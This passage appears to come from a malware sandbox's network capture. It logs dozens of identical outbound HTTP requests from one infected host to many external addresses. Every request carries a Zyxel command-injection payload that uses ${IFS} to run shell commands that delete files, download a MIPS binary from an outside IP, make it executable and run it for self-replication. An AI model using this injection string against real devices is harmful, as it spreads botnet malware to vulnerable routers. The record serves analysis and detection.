                                                Jan 12, 2024 18:16:12.188678980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1684192.168.2.2358192191.189.194.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188713074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1685192.168.2.2349368175.7.122.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188766956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1686192.168.2.2354648187.15.192.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188806057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1687192.168.2.234767625.223.23.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188837051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1688192.168.2.233540465.56.199.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188862085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1689192.168.2.2337130182.138.60.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188915968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1690192.168.2.2347852126.12.100.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188930035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1691192.168.2.234959283.246.233.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188956022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1692192.168.2.2344820162.93.172.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189014912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1693192.168.2.234589045.230.242.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189042091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1694192.168.2.235938680.143.136.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189069033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1695192.168.2.233503244.38.64.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189090014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1696192.168.2.234688661.192.43.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189132929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1697192.168.2.234754098.125.233.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189171076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1698192.168.2.233711237.135.232.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189205885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1699192.168.2.2341502109.228.247.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189239025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1700192.168.2.233582685.200.27.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189287901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1701192.168.2.233306017.234.240.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189312935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1702192.168.2.235590847.72.197.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189377069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1703192.168.2.2351508209.100.53.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189400911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1704192.168.2.234825459.61.48.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189467907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1705192.168.2.2344474108.80.29.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189491987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1706192.168.2.2354964125.64.248.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189533949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1707192.168.2.233812440.223.150.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189549923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1708192.168.2.2354588153.160.42.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189577103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1709192.168.2.2352296182.249.112.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189645052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1710192.168.2.2344384110.172.117.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189663887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1711192.168.2.233307274.136.73.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189699888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1712192.168.2.2360632117.73.179.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189747095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1713192.168.2.2334382205.31.222.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189785004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1714192.168.2.2336596185.163.47.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189826965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1715192.168.2.2343740157.187.85.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189853907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1716192.168.2.2338382164.223.60.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189877987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1717192.168.2.2350070176.229.61.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189930916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1718192.168.2.234471082.239.42.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.189975977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1719192.168.2.234382624.72.94.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190027952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1720192.168.2.2360008163.244.62.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190078974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1721192.168.2.233647883.65.90.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190119982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1722192.168.2.2336010145.14.235.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190150976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1723192.168.2.2360246196.233.178.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190190077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1724192.168.2.234679682.34.145.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190227985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1725192.168.2.2349564203.201.137.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190259933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1726192.168.2.234601853.203.204.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190308094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1727192.168.2.2359534148.158.27.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190335989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1728192.168.2.234729038.64.123.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190372944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1729192.168.2.2342730143.243.247.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190442085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1730192.168.2.2359404193.26.17.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190469027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1731192.168.2.23602942.195.138.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190531015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1732192.168.2.2353358130.226.74.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190561056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1733192.168.2.2358806131.36.53.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190604925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1734192.168.2.233602274.73.225.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190654039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1735192.168.2.2338280220.137.153.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190681934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1736192.168.2.234795487.183.182.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190721989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1737192.168.2.2349182163.28.19.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190777063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1738192.168.2.2348062216.232.143.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190783978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1739192.168.2.2346986182.24.52.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190813065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1740192.168.2.235205049.113.46.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190862894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1741192.168.2.2336884203.90.204.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190892935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1742192.168.2.235089019.246.177.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190947056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1743192.168.2.2335418191.148.156.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.190977097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1744192.168.2.2338116197.241.233.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191004992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1745192.168.2.2357096185.235.117.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.191041946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1746192.168.2.234133682.164.154.141443
                                                TimestampBytes transferredDirectionData
